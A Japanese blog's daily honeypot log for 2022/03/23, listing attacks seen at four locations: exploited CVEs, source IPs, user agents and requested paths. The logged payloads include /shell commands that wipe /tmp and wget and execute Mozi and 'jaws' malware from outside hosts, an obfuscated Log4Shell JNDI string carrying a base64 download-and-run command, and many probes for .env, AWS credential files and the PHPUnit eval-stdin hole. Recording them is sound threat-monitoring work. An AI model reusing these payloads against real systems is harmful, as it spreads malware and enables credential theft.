コンニチハレバレトシタアオゾラ

つれづれなるままに、日暮らし、ぶろぐにむかひて、心にうつりゆくよしなしごとを、そこはかとなく書きつくれば、

2022/03/23 ハニーポット(仮) 観測記録

ハニーポット(仮) 観測記録 2022/03/23分です。

特徴
共通

Apache Log4j2の脆弱性(CVE-2021-44228)を狙うアクセス
D-link製品の脆弱性を狙うアクセス
GPONルータの脆弱性を狙うアクセス
/.envへのスキャン行為

Location:JP

PHPUnit脆弱性(CVE-2017-9841)を狙うアクセス
Anarchy99によるスキャン行為
/.awsへのスキャン行為
WordPress Pluginへのスキャン行為
UserAgentがHello, Worldであるアクセス

を確認しました。

/shellに対する以下のアクセスを確認しました。

cd /tmp;
rm -rf *;
wget  jswl.jdaili.xyz/jaws;
sh /tmp/jaws
Location:US

Apache HTTP Serverの脆弱性(CVE-2021-41773)を狙うアクセス
Liferay Portal JSON Web Serviceの脆弱性(CVE-2020-7961)を狙うアクセス
PHPUnit脆弱性(CVE-2017-9841)を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
Apache Solrへのスキャン行為
Laravelへのスキャン行為
UserAgentがHello, Worldであるアクセス
UserAgentがHello, worldであるアクセス

を確認しました。

/shellに対する以下のアクセスを確認しました。

cd /tmp;
rm -rf *;
wget http://221.5.61.172:35145/Mozi.a;
chmod 777 Mozi.a;
/tmp/Mozi.a jaws
Location:UK

Apache HTTP Serverの脆弱性(CVE-2021-41773)を狙うアクセス
Liferay Portal JSON Web Serviceの脆弱性(CVE-2020-7961)を狙うアクセス
Laravelへのスキャン行為
UserAgentがHello, Worldであるアクセス
UserAgentがHello, worldであるアクセス

を確認しました。

/shellに対する以下のアクセスを確認しました。

cd /tmp;
rm -rf *;
wget  jswl.jdaili.xyz/jaws;
sh /tmp/jaws
cd /tmp;
rm -rf *;
wget 0.0.0.0/jaws;
sh /tmp/jaws
cd /tmp;
rm -rf *;
wget 31.210.20.109/jaws;
sh /tmp/jaws
Location:SG

Apache Log4j2の脆弱性(CVE-2021-44228)を狙うアクセス
Liferay Portal JSON Web Serviceの脆弱性(CVE-2020-7961)を狙うアクセス
NetGear製品の脆弱性を狙うアクセス
Anarchy99によるスキャン行為
Laravelへのスキャン行為

を確認しました。

/shellに対する以下のアクセスを確認しました。

cd /tmp;
rm -rf *;
wget  jswl.jdaili.xyz/jaws;
sh /tmp/jaws
アクセス数推移

JP:総アクセス数:424 (前日比:331)
US:総アクセス数:59 (前日比:11)
UK:総アクセス数:44 (前日比:11)
SG:総アクセス数:59 (前日比:-228)

都合により GET / HTTP/1.1 POST / HTTP/1.1 は除いています。

Location:JP

送信元IPアドレス一覧

件数 送信元IPアドレス
2 20.25.6.17 United States
1 20.89.95.126 United States
1 20.127.118.8 United States
1 20.223.159.160 United States
2 20.225.50.219 United States
2 23.95.100.141 United States
1 31.210.20.109 Netherlands
1 34.96.130.10 United States
2 41.237.179.20 Egypt
1 41.239.118.78 Egypt
1 44.242.144.154 United States
1 45.137.21.166 Bangladesh
2 54.189.47.242 United States
1 69.194.182.218 United States
16 95.214.235.205 Ukraine
1 109.237.103.9 Russia
1 109.237.103.123 Russia
327 129.158.230.38 United States
8 132.145.9.189 United States
1 134.122.3.160 United States
5 135.125.246.110 France
7 135.125.246.189 France
1 137.184.45.98 United States
1 137.184.125.204 United States
1 137.184.238.43 United States
1 143.198.8.32 United States
7 149.56.234.155 Canada
1 156.218.183.15 Egypt
2 157.245.70.127 United States
1 159.223.130.128 United States
1 159.223.139.250 United States
1 165.227.146.254 United States
1 175.100.20.202 Cambodia
1 185.81.157.112 France
8 185.254.196.217 Ukraine
1 192.241.224.53 United States
1 197.47.155.227 Egypt
2 197.63.210.109 Egypt
4 198.20.87.98 United States
1 221.214.202.223 China
3 222.186.19.235 China

UserAgent一覧

件数 UserAgent
26 -
1 Anarchy99
1 Hello, World
1 Mozila/5.0
1 Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:80.0) Gecko/20100101 Firefox/80.0
1 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
7 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36
1 Mozilla/5.0 (Windows NT 5.2) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.794.0 Safari/535.1
327 Mozilla/5.0 (Windows; U; MSIE 6.1; Windows NT.6.2; .NET CLR 2.4.23000; Win64; x64)
54 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
1 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0
1 Mozilla/5.0 (iPhone; CPU iPhone OS 12_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/15E148
1 Mozilla/5.0 ArchLinux (X11; U; Linux x86_64; en-US) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.60 Safari/534.30
1 t('${${env:BARFOO:-j}ndi${env:BARFOO:-:}${env:BARFOO:-l}dap${env:BARFOO:-:}//178[.]62[.]196[.]118:1389/TomcatBypass/Command/Base64/d2dldCBodHRwOi8vNTEuMTYxLjY0LjE5Ny84VXNBMi5zaDsgY3VybCAtTyBodHRwOi8vNTEuMTYxLjY0LjE5Ny84VXNBMi5zaDsgY2htb2QgNzc3IDhVc0EyLnNoOyBzaCA4VXNBMi5zaDsgcm0gLXJmICo=}')

リクエスト内容一覧

件数 Method Request Protocol
1 MGLNDD_18.179.20.5_80\n
1 \x16\x03\x01\x01\xfa\x01
2 \x16\x03\x01
1 GET /.aws/credentials HTTP/1.1
1 GET /.env.backup HTTP/1.1
2 GET /.env.bak HTTP/1.1
1 GET /.env.bkp HTTP/1.1
1 GET /.env.copy HTTP/1.1
1 GET /.env.dev.local HTTP/1.1
1 GET /.env.dev HTTP/1.1
1 GET /.env.development.local HTTP/1.1
1 GET /.env.development HTTP/1.1
1 GET /.env.docker.dev HTTP/1.1
1 GET /.env.example HTTP/1.1
1 GET /.env.live HTTP/1.1
1 GET /.env.local HTTP/1.1
1 GET /.env.old HTTP/1.1
1 GET /.env.prod.local HTTP/1.1
1 GET /.env.prod HTTP/1.1
1 GET /.env.production.local HTTP/1.1
1 GET /.env.production HTTP/1.1
1 GET /.env.remote HTTP/1.1
1 GET /.env.sample.php HTTP/1.1
1 GET /.env.save HTTP/1.1
1 GET /.env.stage HTTP/1.1
1 GET /.env.staging HTTP/1.1
1 GET /.env.swp HTTP/1.1
1 GET /.env.test.local HTTP/1.1
1 GET /.env.test HTTP/1.1
58 GET /.env HTTP/1.1
1 GET /.env~ HTTP/1.1
1 GET /.local HTTP/1.1
1 GET /.production HTTP/1.1
1 GET /.remote HTTP/1.1
1 GET /.well-known/security.txt HTTP/1.1
1 GET //api/.env.backup HTTP/1.1
1 GET //api/.env.bak HTTP/1.1
1 GET //api/.env.copy HTTP/1.1
1 GET //api/.env.old HTTP/1.1
1 GET //api/.env.test HTTP/1.1
1 GET //api/.env HTTP/1.1
1 GET //api/.remote HTTP/1.1
1 GET //app/.env.backup HTTP/1.1
1 GET //app/.env.bak HTTP/1.1
1 GET //app/.env.copy HTTP/1.1
1 GET //app/.env.old HTTP/1.1
1 GET //app/.env.test HTTP/1.1
1 GET //app/.env HTTP/1.1
1 GET //app/.remote HTTP/1.1
1 GET //bak/.env.backup HTTP/1.1
1 GET //bak/.env.bak HTTP/1.1
1 GET //bak/.env.copy HTTP/1.1
1 GET //bak/.env.old HTTP/1.1
1 GET //bak/.env.test HTTP/1.1
1 GET //bak/.env HTTP/1.1
1 GET //bak/.remote HTTP/1.1
1 GET //bkp/.env.backup HTTP/1.1
1 GET //bkp/.env.bak HTTP/1.1
1 GET //bkp/.env.copy HTTP/1.1
1 GET //bkp/.env.old HTTP/1.1
1 GET //bkp/.env.test HTTP/1.1
1 GET //bkp/.env HTTP/1.1
1 GET //bkp/.remote HTTP/1.1
1 GET //blog/.env HTTP/1.1
1 GET //blogs/.env HTTP/1.1
1 GET //core/.env.backup HTTP/1.1
1 GET //core/.env.bak HTTP/1.1
1 GET //core/.env.copy HTTP/1.1
1 GET //core/.env.old HTTP/1.1
1 GET //core/.env.test HTTP/1.1
1 GET //core/.env HTTP/1.1
1 GET //core/.remote HTTP/1.1
1 GET //cron/.env.backup HTTP/1.1
1 GET //cron/.env.bak HTTP/1.1
1 GET //cron/.env.copy HTTP/1.1
1 GET //cron/.env.old HTTP/1.1
1 GET //cron/.env.test HTTP/1.1
1 GET //cron/.env HTTP/1.1
1 GET //cron/.remote HTTP/1.1
1 GET //cronjob/.env.backup HTTP/1.1
1 GET //cronjob/.env.bak HTTP/1.1
1 GET //cronjob/.env.copy HTTP/1.1
1 GET //cronjob/.env.old HTTP/1.1
1 GET //cronjob/.env.test HTTP/1.1
1 GET //cronjob/.env HTTP/1.1
1 GET //cronjob/.remote HTTP/1.1
1 GET //dash/.env.backup HTTP/1.1
1 GET //dash/.env.bak HTTP/1.1
1 GET //dash/.env.copy HTTP/1.1
1 GET //dash/.env.old HTTP/1.1
1 GET //dash/.env.test HTTP/1.1
1 GET //dash/.env HTTP/1.1
1 GET //dash/.remote HTTP/1.1
1 GET //dashboard/.env.backup HTTP/1.1
1 GET //dashboard/.env.bak HTTP/1.1
1 GET //dashboard/.env.copy HTTP/1.1
1 GET //dashboard/.env.old HTTP/1.1
1 GET //dashboard/.env.test HTTP/1.1
1 GET //dashboard/.env HTTP/1.1
1 GET //dashboard/.remote HTTP/1.1
1 GET //main/.env.backup HTTP/1.1
1 GET //main/.env.bak HTTP/1.1
1 GET //main/.env.copy HTTP/1.1
1 GET //main/.env.old HTTP/1.1
1 GET //main/.env.test HTTP/1.1
1 GET //main/.env HTTP/1.1
1 GET //main/.remote HTTP/1.1
1 GET //site/.env HTTP/1.1
1 GET //stg/.env.backup HTTP/1.1
1 GET //stg/.env.bak HTTP/1.1
1 GET //stg/.env.copy HTTP/1.1
1 GET //stg/.env.old HTTP/1.1
1 GET //stg/.env.test HTTP/1.1
1 GET //stg/.env HTTP/1.1
1 GET //stg/.remote HTTP/1.1
1 GET //test/.env.backup HTTP/1.1
1 GET //test/.env.bak HTTP/1.1
1 GET //test/.env.copy HTTP/1.1
1 GET //test/.env.old HTTP/1.1
1 GET //test/.env.test HTTP/1.1
1 GET //test/.env HTTP/1.1
1 GET //test/.remote HTTP/1.1
1 GET /:undefined HTTP/1.1
2 GET /_profiler/phpinfo HTTP/1.1
1 GET /ab2g HTTP/1.1
1 GET /ab2h HTTP/1.1
1 GET /config.json HTTP/1.1
1 GET /config/aws.yml HTTP/1.1
1 GET /config HTTP/1.1
1 GET /favicon.ico HTTP/1.1
2 GET /info.php HTTP/1.1
1 GET /php.ini HTTP/1.1
2 GET /phpinfo.php HTTP/1.1
2 GET /phpinfo HTTP/1.1
1 GET /robots.txt HTTP/1.1
7 GET /shell?cd+/tmp;rm+-rf+*;wget+ jswl.jdaili.xyz/jaws;sh+/tmp/jaws
1 GET /sitemap.xml HTTP/1.1
1 GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
2 GET http[:]//fuwu[.]sogou[.]com/404/index.html HTTP/1.1
2 HEAD / HTTP/1.0
1 POST //172410101040/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 POST //1board/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 POST //20170811125232/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 POST //2018/scholarship/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 POST //2018/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 POST //2019/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 POST //2020/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 POST //4walls/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 POST //6p6/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 POST //AlkatreszProject/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 POST //Berg/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 POST //Cloudflare-CPanel-7.0.1/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 POST //Code/snippets/html2pdf-master/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 POST //_inc/vendor/stripe/stripe-php/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 POST //_staff/cron/php/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 POST //_staff/php/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 POST //academy2019/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 POST //acellemail/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 POST //admin/ckeditor/plugins/ajaxplorer/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 POST //admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 POST //ads_qu_merge/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 POST //adv/advDesenvolvimento-1003/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 POST //adv/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 POST //adv2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 POST //adv3/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 POST //advDesenvolvimento-1003/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 POST //advanced/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 POST //afasio/afasio/backend_Julia/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 POST //afasio/backend_Julia/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 POST //afasio/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 POST //agc_app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 POST //albraj/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 POST //aliceapi/authorizenet/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 POST //aliceapi/client_billing/authorizenet/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 POST //all/spotbills/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 POST //all/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 POST //alpha/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 POST //alpha[.]u2start[.]com/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 POST //alquimialaravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 POST //apde[.]edu[.]gt/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 POST //api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 POST //api1/vendor/phpunit/phpunit/src/Util/PHP/Template/eval-stdin.php HTTP/1.1
1 POST //api1/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 POST //api2/vendor/phpunit/phpunit/src/Util/PHP/Template/eval-stdin.php HTTP/1.1
1 POST //api2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 POST //api3/vendor/phpunit/phpunit/src/Util/PHP/Template/eval-stdin.php HTTP/1.1
1 POST //api3/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 POST //api4/vendor/phpunit/phpunit/src/Util/PHP/Template/eval-stdin.php HTTP/1.1
1 POST //api4/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 POST //api5/vendor/phpunit/phpunit/src/Util/PHP/Template/eval-stdin.php HTTP/1.1
1 POST //api5/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 POST //api[.]goover[.]city/release/composer/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 POST //api_muvin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 POST //api_source/firebase/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 POST //api_source/webservice/firebase/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 POST //apimotor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 POST //apitotsurvey/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 POST //app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 POST //app[.]rideforhopebahamas[.]com/main-app/app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 POST //apps/shopify/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 POST //apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 POST //aptapi/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 POST //argotractorsrmi[.]net/publichtml/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 POST //assets/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 POST //atasem/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 POST //atoms/raphaelfonseca/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 POST //atoms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 POST //auth/saml/extlib/simplesamlphp/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 POST //authenticate/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 POST //autoupgrade/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 POST //avastar/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 POST //b2b/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 POST //b2bapi/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 POST //b2c/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 POST //back/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 POST //backend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 POST //backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 POST //bank/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 POST //batin24/back/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 POST //batin24/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 POST //bdi[.]talenta/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 POST //beatricce/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 POST //begrand/downtown_reforma/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 POST //begrand/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 POST //beta/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 POST //betanew/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 POST //blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 POST //blog/wp-content/plugins/cloudflare/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 POST //blog/wp-content/plugins/dzs-videogallery/class_parts/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 POST //blog/wp-content/plugins/mm-plugin/inc/vendors/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 POST //blog/www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 POST //bmwstory/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 POST //bots/globals/e_detector/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 POST //bots/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 POST //bowenpayments/bowenpay/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 POST //buddha/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 POST //byroernne/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 POST //c2b/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 POST //c2c/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 POST //cafe50/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 POST //cag/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 POST //campuslag/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 POST //careers/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 POST //casadosvidros/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 POST //client_billing/authorizenet/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 POST //clientes/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 POST //clinicasoftware/app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 POST //clinicasoftware/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 POST //cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 POST //compareip/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 POST //composer-master/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 POST //concrete/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 POST //config/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 POST //consulation/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 POST //contact/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 POST //core/Datavase/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 POST //core/app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 POST //core/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 POST //crea2019/app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 POST //crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 POST //cron/php/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 POST //cron/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 POST //cronlab/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 POST //csbank/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 POST //ctevt/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 POST //curso-styde/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 POST //darm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 POST //database/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 POST //datagen/emrDataGenerator/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 POST //datagen/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 POST //demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 POST //demos/dev_grupo_total/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 POST //demos/laravel-sites/dev_grupo_total/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 POST //denuncias/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 POST //deportes/api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 POST //deportes/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 POST //dev/intranet-broken/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 POST //dev/iscent/releases/20170811125232/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 POST //dev/test1/project/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 POST //dev/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 POST //dev_grupo_total/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 POST //dev_zarrel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 POST //develop/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 POST //df2communitywebsite/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 POST //digitalscience/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 POST //doae-production/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 POST //dompdf-master/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 POST //downtown_reforma/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 POST //drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 POST //e_detector/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 POST //ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 POST //ecc/fashion_club/laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 POST //ecc/laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 POST //ecc/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 POST //elections/app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 POST //elso1000nap-foto/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 POST //emediamarket-be/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 POST //empresasbrasil/production/api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 POST //emr/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 POST //emrDataGenerator/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 POST //entmain/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 POST //enventa/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 POST //epayco-php/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 POST //epayco/epayco-php/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 POST //epayco/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 POST //epillTemporaryHolder/authenticate/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 POST //epillTemporaryHolder/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 POST //espanadigital/sitio/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 POST //espanadigital/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 POST //esurat/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 POST //ets/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 POST //eventos-deportivos/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 POST //experts-api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 POST //lib/phpunit/Util/PHP/eval-stdin.php HTTP/1.1
1 POST //lib/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1
1 POST //modules/autoupgrade/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 POST //modules/gamification/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 POST //modules/ps_checkout/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
